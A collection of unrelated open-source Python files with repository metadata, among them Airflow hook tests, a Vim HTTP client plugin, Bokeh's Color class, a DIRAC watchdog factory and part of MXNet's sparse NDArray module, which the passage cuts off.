self.assertEqual(hook.conn_id, 'adl_test_key')
self.assertIsInstance(hook.connection, core.AzureDLFileSystem)
assert mock_lib.auth.called
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.core.AzureDLFileSystem',
autospec=True)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_check_for_blob(self, mock_lib, mock_filesystem):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.check_for_file('file_path')
mock_filesystem.glob.called
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.multithread.ADLUploader',
autospec=True)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_upload_file(self, mock_lib, mock_uploader):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.upload_file(local_path='tests/hooks/test_adl_hook.py',
remote_path='/test_adl_hook.py',
nthreads=64, overwrite=True,
buffersize=4194304, blocksize=4194304)
mock_uploader.assert_called_once_with(hook.connection,
lpath='tests/hooks/test_adl_hook.py',
rpath='/test_adl_hook.py',
nthreads=64, overwrite=True,
buffersize=4194304, blocksize=4194304)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.multithread.ADLDownloader',
autospec=True)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_download_file(self, mock_lib, mock_downloader):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.download_file(local_path='test_adl_hook.py',
remote_path='/test_adl_hook.py',
nthreads=64, overwrite=True,
buffersize=4194304, blocksize=4194304)
mock_downloader.assert_called_once_with(hook.connection,
lpath='test_adl_hook.py',
rpath='/test_adl_hook.py',
nthreads=64, overwrite=True,
buffersize=4194304, blocksize=4194304)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.core.AzureDLFileSystem',
autospec=True)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_list_glob(self, mock_lib, mock_fs):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.list('file_path/*')
mock_fs.return_value.glob.assert_called_with('file_path/*')
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.core.AzureDLFileSystem',
autospec=True)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_list_walk(self, mock_lib, mock_fs):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.list('file_path/some_folder/')
mock_fs.return_value.walk.assert_called_with('file_path/some_folder/')
if __name__ == '__main__':
unittest.main()
|
malmiron/incubator-airflow
|
tests/contrib/hooks/test_azure_data_lake_hook.py
|
Python
|
apache-2.0
| 5,649 | 0.00354 |
import json
import re
import requests
from_cmdline = False
try:
__file__
from_cmdline = True
except NameError:
pass
if not from_cmdline:
import vim
METHOD_REGEX = re.compile('^(GET|POST|DELETE|PUT|HEAD|OPTIONS|PATCH) (.*)$')
HEADER_REGEX = re.compile('^([^()<>@,;:\<>/\[\]?={}]+):\\s*(.*)$')
VAR_REGEX = re.compile('^# ?(:[^: ]+)\\s*=\\s*(.+)$')
GLOBAL_VAR_REGEX = re.compile('^# ?(\$[^$ ]+)\\s*=\\s*(.+)$')
FILE_REGEX = re.compile("!((?:file)|(?:(?:content)))\((.+)\)")
JSON_REGEX = re.compile("(javascript|json)$", re.IGNORECASE)
verify_ssl = vim.eval('g:http_client_verify_ssl') == '1'
def replace_vars(string, variables):
for var, val in variables.items():
string = string.replace(var, val)
return string
def is_comment(s):
return s.startswith('#')
def do_request(block, buf):
variables = dict((m.groups() for m in (GLOBAL_VAR_REGEX.match(l) for l in buf) if m))
variables.update(dict((m.groups() for m in (VAR_REGEX.match(l) for l in block) if m)))
block = [line for line in block if not is_comment(line) and line.strip() != '']
if len(block) == 0:
print('Request was empty.')
return
method_url = block.pop(0)
method_url_match = METHOD_REGEX.match(method_url)
if not method_url_match:
print('Could not find method or URL!')
return
method, url = method_url_match.groups()
url = replace_vars(url, variables)
url = url.strip()
headers = {}
while len(block) > 0:
header_match = HEADER_REGEX.match(block[0])
if header_match:
block.pop(0)
header_name, header_value = header_match.groups()
headers[header_name] = replace_vars(header_value, variables)
else:
break
data = [ replace_vars(l, variables) for l in block ]
files = None
if all([ '=' in l for l in data ]):
# Form data: separate entries into data dict, and files dict
key_value_pairs = dict([ l.split('=', 1) for l in data ])
def to_file(expr):
type, arg = FILE_REGEX.match(expr).groups()
arg = arg.replace('\\(', '(').replace('\\)', ')')
return open(arg, 'rb') if type == 'file' else (arg)
files = dict([(k, to_file(v)) for (k, v) in key_value_pairs.items() if FILE_REGEX.match(v)])
data = dict([(k, v) for (k, v) in key_value_pairs.items() if not FILE_REGEX.match(v)])
else:
# Straight data: just send it off as a string.
data = '\n'.join(data)
if not verify_ssl:
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
json_data = None
if headers.get('Content-Type') == 'application/json':
json_data = json.loads(data)
data = None
response = requests.request(method, url, verify=verify_ssl, headers=headers, data=data, files=files, json=json_data)
content_type = response.headers.get('Content-Type', '').split(';')[0]
response_body = response.text
if JSON_REGEX.search(content_type):
content_type = 'application/json'
try:
response_body = json.dumps(
json.loads(response.text), sort_keys=True, indent=2,
separators=(',', ': '),
ensure_ascii=vim.eval('g:http_client_json_escape_utf')=='1')
except ValueError:
pass
display = (
response_body.split('\n') +
['', '// status code: %s' % response.status_code] +
['// %s: %s' % (k, v) for k, v in response.headers.items()]
)
return display, content_type
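# Example of the request block format parsed by do_request(): '#' comments may
# define buffer-local ':var' or global '$var' substitutions, the first
# non-comment line is 'METHOD URL', optional 'Header: value' lines follow, and
# any remaining lines form the body (httpbin.org is only an illustration).
#
#   # :token = abc123
#   POST http://httpbin.org/post
#   X-Auth: :token
#   some data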
# Vim methods.
def vim_filetypes_by_content_type():
return {
'application/json': vim.eval('g:http_client_json_ft'),
'application/xml': 'xml',
'text/html': 'html'
}
BUFFER_NAME = '__HTTP_Client_Response__'
def find_block(buf, line_num):
length = len(buf)
is_buffer_terminator = lambda s: s.strip() == ''
block_start = line_num
while block_start > 0 and not is_buffer_terminator(buf[block_start]):
block_start -= 1
block_end = line_num
while block_end < length and not is_buffer_terminator(buf[block_end]):
block_end += 1
return buf[block_start:block_end + 1]
def open_scratch_buffer(contents, filetype):
previous_window = vim.current.window
existing_buffer_window_id = vim.eval('bufwinnr("%s")' % BUFFER_NAME)
if existing_buffer_window_id == '-1':
if vim.eval('g:http_client_result_vsplit') == '1':
split_cmd = 'vsplit'
else:
split_cmd = 'split'
vim.command('rightbelow %s %s' % (split_cmd, BUFFER_NAME))
vim.command('setlocal buftype=nofile nospell')
else:
vim.command('%swincmd w' % existing_buffer_window_id)
vim.command('set filetype=%s' % filetype)
write_buffer(contents, vim.current.buffer)
if vim.eval('g:http_client_focus_output_window') != '1':
vim.current.window = previous_window
def do_request_from_buffer():
win = vim.current.window
line_num = win.cursor[0] - 1
block = find_block(win.buffer, line_num)
result = do_request(block, win.buffer)
if result:
response, content_type = result
vim_ft = vim_filetypes_by_content_type().get(content_type, 'text')
open_scratch_buffer(response, vim_ft)
def write_buffer(contents, buffer):
if vim.eval('g:http_client_preserve_responses') == '1':
if len(buffer):
buffer[0:0] = [""]
buffer[0:0] = contents
vim.command('0')
else:
buffer[:] = contents
# Tests.
def run_tests():
import json
def extract_json(resp):
return json.loads(''.join([ l for l in resp[0] if not l.startswith('//') ]))
def test(assertion, test):
print('Test %s: %s' % ('passed' if assertion else 'failed', test))
if not assertion:
raise AssertionError
resp = extract_json(do_request([
'# comment',
'# :a=barf',
'GET http://httpbin.org/headers',
'X-Hey: :a',
'# comment'
], []))
test(resp['headers']['X-Hey'] == 'barf', 'Headers are passed with variable substitution.')
resp = extract_json(do_request([
'# :a = barf',
'GET http://httpbin.org/get?data=:a'
], []))
test(resp['args']['data'] == 'barf', 'GET data is passed with variable substitution.')
resp = extract_json(do_request([
'POST http://httpbin.org/post',
'some data'
], []))
test(resp['data'] == 'some data', 'POST data is passed with variable substitution.')
resp = extract_json(do_request([
'POST http://httpbin.org/post',
'forma=a',
'formb=b',
], []))
test(resp['form']['forma'] == 'a', 'POST form data is passed.')
resp = extract_json(do_request([
'POST http://$global/post',
'forma=a',
'formb=b',
], [ '# $global = httpbin.org']))
test(resp['form']['forma'] == 'a', 'Global variables are substituted.')
import os
from tempfile import NamedTemporaryFile
SAMPLE_FILE_CONTENT = 'sample file content'
temp_file = NamedTemporaryFile(delete = False)
temp_file.write(SAMPLE_FILE_CONTENT)
temp_file.close()
resp = extract_json(do_request([
'POST http://httpbin.org/post',
'forma=a',
'formb=b',
"formc=!file(%s)" % temp_file.name,
], []))
test(resp['files']['formc'] == SAMPLE_FILE_CONTENT, 'Files given as path are sent properly.')
test(not 'formc' in resp['form'], 'File not included in form data.')
os.unlink(temp_file.name)
resp = extract_json(do_request([
'POST http://httpbin.org/post',
'forma=a',
'formb=b',
"formc=!content(%s)" % SAMPLE_FILE_CONTENT,
], []))
test(resp['files']['formc'] == SAMPLE_FILE_CONTENT, 'Files given as content are sent properly.')
resp = extract_json(do_request([
'POST http://httpbin.org/post',
"c=!content(foo \\(bar\\))",
], []))
test(resp['files']['c'] == 'foo (bar)', 'Escaped parenthesis should be unescaped during request')
if from_cmdline:
run_tests()
|
aquach/vim-http-client
|
plugin/http_client.py
|
Python
|
mit
| 8,172 | 0.005996 |
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.ENTSOE.Dynamics.IEC61970.Core.CorePowerSystemResource import CorePowerSystemResource
class ExcitationSystemsExcAC3A(CorePowerSystemResource):
def __init__(self, ta=0.0, ka=0.0, kd=0.0, se1=0.0, kc=0.0, se2=0.0, te=0.0, tf=0.0, tb=0.0, tc=0.0, vamax=0.0, kf=0.0, vemin=0.0, ke=0.0, vfemax=0.0, tr=0.0, e2=0.0, e1=0.0, kn=0.0, vamin=0.0, kr=0.0, efdn=0.0, *args, **kw_args):
"""Initialises a new 'ExcitationSystemsExcAC3A' instance.
@param ta:
@param ka:
@param kd:
@param se1:
@param kc:
@param se2:
@param te:
@param tf:
@param tb:
@param tc:
@param vamax:
@param kf:
@param vemin:
@param ke:
@param vfemax:
@param tr:
@param e2:
@param e1:
@param kn:
@param vamin:
@param kr:
@param efdn:
"""
self.ta = ta
self.ka = ka
self.kd = kd
self.se1 = se1
self.kc = kc
self.se2 = se2
self.te = te
self.tf = tf
self.tb = tb
self.tc = tc
self.vamax = vamax
self.kf = kf
self.vemin = vemin
self.ke = ke
self.vfemax = vfemax
self.tr = tr
self.e2 = e2
self.e1 = e1
self.kn = kn
self.vamin = vamin
self.kr = kr
self.efdn = efdn
super(ExcitationSystemsExcAC3A, self).__init__(*args, **kw_args)
_attrs = ["ta", "ka", "kd", "se1", "kc", "se2", "te", "tf", "tb", "tc", "vamax", "kf", "vemin", "ke", "vfemax", "tr", "e2", "e1", "kn", "vamin", "kr", "efdn"]
_attr_types = {"ta": float, "ka": float, "kd": float, "se1": float, "kc": float, "se2": float, "te": float, "tf": float, "tb": float, "tc": float, "vamax": float, "kf": float, "vemin": float, "ke": float, "vfemax": float, "tr": float, "e2": float, "e1": float, "kn": float, "vamin": float, "kr": float, "efdn": float}
_defaults = {"ta": 0.0, "ka": 0.0, "kd": 0.0, "se1": 0.0, "kc": 0.0, "se2": 0.0, "te": 0.0, "tf": 0.0, "tb": 0.0, "tc": 0.0, "vamax": 0.0, "kf": 0.0, "vemin": 0.0, "ke": 0.0, "vfemax": 0.0, "tr": 0.0, "e2": 0.0, "e1": 0.0, "kn": 0.0, "vamin": 0.0, "kr": 0.0, "efdn": 0.0}
_enums = {}
_refs = []
_many_refs = []
|
rwl/PyCIM
|
CIM14/ENTSOE/Dynamics/IEC61970/Dynamics/ExcitationSystems/ExcitationSystemsExcAC3A.py
|
Python
|
mit
| 3,453 | 0.01448 |
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2017, Anaconda, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
''' Provide a base class for representing color values.
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
log = logging.getLogger(__name__)
from bokeh.util.api import public, internal ; public, internal
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
# External imports
# Bokeh imports
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Public API
#-----------------------------------------------------------------------------
@public((1,0,0))
class Color(object):
''' A base class for representing color objects.
'''
def __repr__(self):
return self.to_css()
@staticmethod
@public((1,0,0))
def clamp(value, maximum=None):
''' Clamp numeric values to be non-negative, an optionally, less than a
given maximum.
Args:
value (float) :
A number to clamp.
            maximum (float, optional) :
                A max bound to clamp to. If None, there is no upper bound,
                and values are only clamped to be non-negative. (default: None)
Returns:
float
'''
value = max(value, 0)
if maximum is not None:
return min(value, maximum)
else:
return value
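    # Quick examples for clamp(), derived from the implementation above:
    #   Color.clamp(-0.2)              # -> 0
    #   Color.clamp(1.5, maximum=1.0)  # -> 1.0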
@public((1,0,0))
def copy(self):
''' Copy this color.
*Subclasses must implement this method.*
'''
raise NotImplementedError
@public((1,0,0))
def darken(self, amount):
        ''' Darken (reduce the luminance of) this color.
Args:
amount (float) :
Amount to reduce the luminance by (clamped above zero)
Returns:
Color
'''
hsl = self.to_hsl()
hsl.l = self.clamp(hsl.l - amount)
return self.from_hsl(hsl)
@classmethod
@public((1,0,0))
def from_hsl(cls, value):
''' Create a new color by converting from an HSL color.
*Subclasses must implement this method.*
Args:
value (HSL) :
A color to convert from HSL
Returns:
Color
'''
raise NotImplementedError
@classmethod
@public((1,0,0))
def from_rgb(cls, value):
''' Create a new color by converting from an RGB color.
*Subclasses must implement this method.*
Args:
value (:class:`~bokeh.colors.rgb.RGB`) :
A color to convert from RGB
Returns:
Color
'''
raise NotImplementedError
@public((1,0,0))
def lighten(self, amount):
        ''' Lighten (increase the luminance of) this color.
Args:
amount (float) :
Amount to increase the luminance by (clamped above zero)
Returns:
Color
'''
hsl = self.to_hsl()
hsl.l = self.clamp(hsl.l + amount, 1)
return self.from_hsl(hsl)
@public((1,0,0))
def to_css(self):
''' Return a CSS representation of this color.
*Subclasses must implement this method.*
Returns:
str
'''
raise NotImplementedError
@public((1,0,0))
def to_hsl(self):
''' Create a new HSL color by converting from this color.
*Subclasses must implement this method.*
Returns:
HSL
'''
raise NotImplementedError
@public((1,0,0))
def to_rgb(self):
        ''' Create a new RGB color by converting from this color.
*Subclasses must implement this method.*
Returns:
:class:`~bokeh.colors.rgb.RGB`
'''
raise NotImplementedError
#-----------------------------------------------------------------------------
# Internal API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
philippjfr/bokeh
|
bokeh/colors/color.py
|
Python
|
bsd-3-clause
| 5,085 | 0.00885 |
# -*- coding: utf-8 -*-
from .. import server, utils
class Memcached(server.Server):
binary = 'memcached'
def init(self, **kwargs):
self.binary = utils.find_binary(kwargs.get('memcached_bin', self.binary))
        assert 'ip' in kwargs, "memcached server requires <ip> option"
self.ip = kwargs['ip']
        assert 'port' in kwargs, "memcached server requires <port> option"
self.port = kwargs['port']
self.command = [ self.binary, '-l', self.ip, '-p', self.port ]
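# Hypothetical instantiation sketch; the constructor arguments come from the
# base server.Server class, which is not shown in this file.
#   srv = Memcached(...)
#   srv.init(ip='127.0.0.1', port='11211', memcached_bin='memcached')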
|
mialinx/testenv
|
testenv/contrib/memcached.py
|
Python
|
mit
| 510 | 0.005882 |
""" The Watchdog Factory instantiates a given Watchdog based on a quick
determination of the local operating system.
"""
__RCSID__ = "$Id$"
import re
import platform
from DIRAC import S_OK, S_ERROR, gLogger
class WatchdogFactory( object ):
#############################################################################
def __init__(self):
""" Standard constructor
"""
self.version = platform.uname()
self.log = gLogger.getSubLogger( 'WatchdogFactory' )
self.watchDogsLocation = 'DIRAC.WorkloadManagementSystem.JobWrapper'
#############################################################################
def getWatchdog( self, pid, exeThread, spObject, jobCPUTime, memoryLimit, processors = 1, jobArgs = {} ):
""" This method returns the CE instance corresponding to the local OS. The Linux watchdog is returned by default.
"""
if re.search( 'Darwin', self.version[0] ):
localOS = 'Mac'
self.log.info( 'WatchdogFactory will create Watchdog%s instance' % ( localOS ) )
# elif re.search( 'Windows', self.version[0] ):
# localOS = 'Windows'
# self.log.info( 'WatchdogFactory will create Watchdog%s instance' % ( localOS ) )
else:
localOS = 'Linux'
self.log.info( 'WatchdogFactory will create Watchdog%s instance' % ( localOS ) )
subClassName = "Watchdog%s" % ( localOS )
try:
wdModule = __import__( self.watchDogsLocation + '.%s' % subClassName, globals(), locals(), [subClassName] )
except ImportError as e:
self.log.exception( "Failed to import module" + self.watchDogsLocation + '.%s' % subClassName + '.%s' % subClassName + ': ' + str(e) )
return S_ERROR( "Failed to import module" )
try:
wd_o = getattr( wdModule, subClassName )( pid = pid,
exeThread = exeThread,
spObject = spObject,
jobCPUTime = jobCPUTime,
memoryLimit = memoryLimit,
processors = processors,
jobArgs = jobArgs )
return S_OK( wd_o )
except AttributeError as e:
self.log.exception( "Failed to create %s(): %s." % ( subClassName, e ) )
return S_ERROR( "Failed to create object" )
#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#
|
andresailer/DIRAC
|
WorkloadManagementSystem/JobWrapper/WatchdogFactory.py
|
Python
|
gpl-3.0
| 2,478 | 0.033495 |
# -*- coding: utf-8 -*-
# © 2017 Didotech srl (www.didotech.com)
{
"name": "BoM Warning",
"version": "4.0.1.2",
"depends": [
"mrp",
"base",
"product",
"warning"
],
"author": "Didotech srl",
"description": """
        This module aims to track warnings on Bills of Material.
""",
"website": "https://www.didotech.com",
"category": "Manufacture Resource Planning",
"data": [
'views/product_view.xml',
'views/mrp_bom_view.xml'
],
"demo": [],
"active": False,
"installable": True,
}
|
iw3hxn/LibrERP
|
mrp_bom_warning/__openerp__.py
|
Python
|
agpl-3.0
| 588 | 0.001704 |
#!/usr/bin/env python3
print("this is a test program to see if")
print("we can make a new file in github")
print("and push it to the hub.")
|
nap-complex/pythonPractice
|
newFile.py
|
Python
|
gpl-3.0
| 143 | 0.006993 |
from distutils.core import setup
import os
from teams import get_version
# Compile the list of packages available, because distutils doesn't have
# an easy way to do this.
packages, data_files = [], []
root_dir = os.path.dirname(__file__)
if root_dir:
os.chdir(root_dir)
for dirpath, dirnames, filenames in os.walk('teams'):
# Ignore dirnames that start with '.'
for i, dirname in enumerate(dirnames):
if dirname.startswith('.'): del dirnames[i]
if '__init__.py' in filenames:
pkg = dirpath.replace(os.path.sep, '.')
if os.path.altsep:
pkg = pkg.replace(os.path.altsep, '.')
packages.append(pkg)
elif filenames:
        prefix = dirpath[6:] # Strip "teams/" or "teams\"
for f in filenames:
data_files.append(os.path.join(prefix, f))
setup(name='django-teams',
version=get_version().replace(' ', '-'),
description='django-teams',
author='Charly Wilhelm',
author_email='charly.wilhelm@gmail.com',
url='https://github.com/cwilhelm/django-teams/wiki',
download_url='https://github.com/cwilhelm/django-teams/zipball/master',
package_dir={'teams': 'teams'},
packages=packages,
package_data={'teams': data_files},
classifiers=['Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Utilities'],
)
|
cwilhelm/django-teams
|
setup.py
|
Python
|
bsd-3-clause
| 1,758 | 0.001706 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
# pylint: disable=wildcard-import, unused-wildcard-import, too-many-lines
"""Sparse NDArray API of MXNet."""
from __future__ import absolute_import
from __future__ import division
try:
from __builtin__ import slice as py_slice
from __builtin__ import sum as py_sum
except ImportError:
from builtins import slice as py_slice
from builtins import sum as py_sum
import ctypes
import warnings
from array import array as native_array
__all__ = ["_ndarray_cls", "csr_matrix", "row_sparse_array",
"BaseSparseNDArray", "CSRNDArray", "RowSparseNDArray"]
import numpy as np
from ..base import NotSupportedForSparseNDArray
from ..base import _LIB, numeric_types
from ..base import c_array_buf, mx_real_t, integer_types
from ..base import mx_uint, NDArrayHandle, check_call
from ..context import Context
from . import _internal
from . import op
try:
from .gen_sparse import * # pylint: disable=redefined-builtin
except ImportError:
pass
from ._internal import _set_ndarray_class
from .ndarray import NDArray, _storage_type, _DTYPE_NP_TO_MX, _DTYPE_MX_TO_NP
from .ndarray import _STORAGE_TYPE_STR_TO_ID, _STORAGE_TYPE_ROW_SPARSE, _STORAGE_TYPE_CSR
from .ndarray import _STORAGE_TYPE_UNDEFINED, _STORAGE_TYPE_DEFAULT
from .ndarray import zeros as _zeros_ndarray
from .ndarray import array as _array
try:
import scipy.sparse as spsp
except ImportError:
spsp = None
_STORAGE_AUX_TYPES = {
'row_sparse': [np.int64],
'csr': [np.int64, np.int64]
}
def _new_alloc_handle(stype, shape, ctx, delay_alloc, dtype, aux_types, aux_shapes=None):
"""Return a new handle with specified storage type, shape, dtype and context.
Empty handle is only used to hold results
Returns
-------
handle
A new empty ndarray handle
"""
hdl = NDArrayHandle()
for aux_t in aux_types:
if np.dtype(aux_t) != np.dtype("int64"):
raise NotImplementedError("only int64 is supported for aux types")
aux_type_ids = [int(_DTYPE_NP_TO_MX[np.dtype(aux_t).type]) for aux_t in aux_types]
aux_shapes = [(0,) for aux_t in aux_types] if aux_shapes is None else aux_shapes
aux_shape_lens = [len(aux_shape) for aux_shape in aux_shapes]
aux_shapes = py_sum(aux_shapes, ())
num_aux = mx_uint(len(aux_types))
check_call(_LIB.MXNDArrayCreateSparseEx(
ctypes.c_int(int(_STORAGE_TYPE_STR_TO_ID[stype])),
c_array_buf(mx_uint, native_array('I', shape)),
mx_uint(len(shape)),
ctypes.c_int(ctx.device_typeid),
ctypes.c_int(ctx.device_id),
ctypes.c_int(int(delay_alloc)),
ctypes.c_int(int(_DTYPE_NP_TO_MX[np.dtype(dtype).type])),
num_aux,
c_array_buf(ctypes.c_int, native_array('i', aux_type_ids)),
c_array_buf(mx_uint, native_array('I', aux_shape_lens)),
c_array_buf(mx_uint, native_array('I', aux_shapes)),
ctypes.byref(hdl)))
return hdl
class BaseSparseNDArray(NDArray):
"""The base class of an NDArray stored in a sparse storage format.
See CSRNDArray and RowSparseNDArray for more details.
"""
def __repr__(self):
"""Returns a string representation of the sparse array."""
shape_info = 'x'.join(['%d' % x for x in self.shape])
# The data content is not displayed since the array usually has big shape
return '\n<%s %s @%s>' % (self.__class__.__name__,
shape_info, self.context)
def __iadd__(self, other):
raise NotImplementedError()
def __isub__(self, other):
raise NotImplementedError()
def __imul__(self, other):
raise NotImplementedError()
def __idiv__(self, other):
raise NotImplementedError()
def __itruediv__(self, other):
raise NotImplementedError()
def _sync_copyfrom(self, source_array):
raise NotImplementedError()
def _at(self, idx):
raise NotSupportedForSparseNDArray(self._at, '[idx]', idx)
def _slice(self, start, stop):
raise NotSupportedForSparseNDArray(self._slice, None, start, stop)
def reshape(self, shape):
raise NotSupportedForSparseNDArray(self.reshape, None, shape)
@property
def size(self):
# the `size` for a sparse ndarray is ambiguous, hence disabled.
raise NotImplementedError()
def _aux_type(self, i):
"""Data-type of the array's ith aux data.
Returns
-------
numpy.dtype
This BaseSparseNDArray's aux data type.
"""
aux_type = ctypes.c_int()
check_call(_LIB.MXNDArrayGetAuxType(self.handle, i, ctypes.byref(aux_type)))
return _DTYPE_MX_TO_NP[aux_type.value]
@property
def _num_aux(self):
"""The number of aux data used to help store the sparse ndarray.
"""
return len(_STORAGE_AUX_TYPES[self.stype])
@property
def _aux_types(self):
"""The data types of the aux data for the BaseSparseNDArray.
"""
aux_types = []
num_aux = self._num_aux
for i in range(num_aux):
aux_types.append(self._aux_type(i))
return aux_types
def asnumpy(self):
"""Return a dense ``numpy.ndarray`` object with value copied from this array
"""
return self.tostype('default').asnumpy()
def astype(self, dtype):
"""Returns a copy of the array after casting to a specified type.
Parameters
----------
dtype : numpy.dtype or str
The type of the returned array.
Examples
--------
>>> x = mx.nd.sparse.zeros('row_sparse', (2,3), dtype='float32')
>>> y = x.astype('int32')
>>> y.dtype
<type 'numpy.int32'>
"""
res = zeros(shape=self.shape, ctx=self.context,
dtype=dtype, stype=self.stype)
self.copyto(res)
return res
def copyto(self, other):
"""Copies the value of this array to another array.
Parameters
----------
other : NDArray or CSRNDArray or RowSparseNDArray or Context
The destination array or context.
Returns
-------
NDArray or CSRNDArray or RowSparseNDArray
The copied array.
"""
if isinstance(other, NDArray):
if other.handle is self.handle:
warnings.warn('You are attempting to copy an array to itself', RuntimeWarning)
return
return _internal._copyto(self, out=other)
elif isinstance(other, Context):
hret = _ndarray_cls(_new_alloc_handle(self.stype, self.shape, other,
True, self.dtype, self._aux_types))
return _internal._copyto(self, out=hret)
else:
raise TypeError('copyto does not support type ' + str(type(other)))
def check_format(self, full_check=True):
"""Check whether the NDArray format is valid.
Parameters
----------
full_check : bool, optional
If `True`, rigorous check, O(N) operations. Otherwise
basic check, O(1) operations (default True).
"""
check_call(_LIB.MXNDArraySyncCheckFormat(self.handle, ctypes.c_bool(full_check)))
def _data(self):
"""A deep copy NDArray of the data array associated with the BaseSparseNDArray.
This function blocks. Do not use it in performance critical code.
"""
self.wait_to_read()
hdl = NDArrayHandle()
check_call(_LIB.MXNDArrayGetDataNDArray(self.handle, ctypes.byref(hdl)))
return NDArray(hdl)
def _aux_data(self, i):
""" Get a deep copy NDArray of the i-th aux data array associated with the
BaseSparseNDArray.
This function blocks. Do not use it in performance critical code.
"""
self.wait_to_read()
hdl = NDArrayHandle()
check_call(_LIB.MXNDArrayGetAuxNDArray(self.handle, i, ctypes.byref(hdl)))
return NDArray(hdl)
# pylint: disable=abstract-method
class CSRNDArray(BaseSparseNDArray):
"""A sparse representation of 2D NDArray in the Compressed Sparse Row format.
A CSRNDArray represents an NDArray as three separate arrays: `data`,
`indptr` and `indices`. It uses the CSR representation where the column indices for
row i are stored in ``indices[indptr[i]:indptr[i+1]]`` and their corresponding values are stored
in ``data[indptr[i]:indptr[i+1]]``.
The column indices for a given row are expected to be sorted in ascending order.
Duplicate column entries for the same row are not allowed.
Example
-------
>>> a = mx.nd.array([[0, 1, 0], [2, 0, 0], [0, 0, 0], [0, 0, 3]])
>>> a = a.tostype('csr')
>>> a.data.asnumpy()
array([ 1., 2., 3.], dtype=float32)
>>> a.indices.asnumpy()
array([1, 0, 2])
>>> a.indptr.asnumpy()
array([0, 1, 2, 2, 3])
See Also
--------
csr_matrix: Several ways to construct a CSRNDArray
"""
def __reduce__(self):
return CSRNDArray, (None,), super(CSRNDArray, self).__getstate__()
def __iadd__(self, other):
(self + other).copyto(self)
return self
def __isub__(self, other):
(self - other).copyto(self)
return self
def __imul__(self, other):
(self * other).copyto(self)
return self
def __idiv__(self, other):
(self / other).copyto(self)
return self
def __itruediv__(self, other):
(self / other).copyto(self)
return self
def __getitem__(self, key):
"""x.__getitem__(i) <=> x[i]
Returns a sliced view of this array.
Parameters
----------
key : int or slice
Indexing key.
Examples
--------
>>> indptr = np.array([0, 2, 3, 6])
>>> indices = np.array([0, 2, 2, 0, 1, 2])
>>> data = np.array([1, 2, 3, 4, 5, 6])
>>> a = mx.nd.sparse.csr_matrix((data, indices, indptr), shape=(3, 3))
>>> a.asnumpy()
array([[ 1., 0., 2.],
[ 0., 0., 3.],
[ 4., 5., 6.]], dtype=float32)
>>> a[1:2].asnumpy()
array([[ 0., 0., 3.]], dtype=float32)
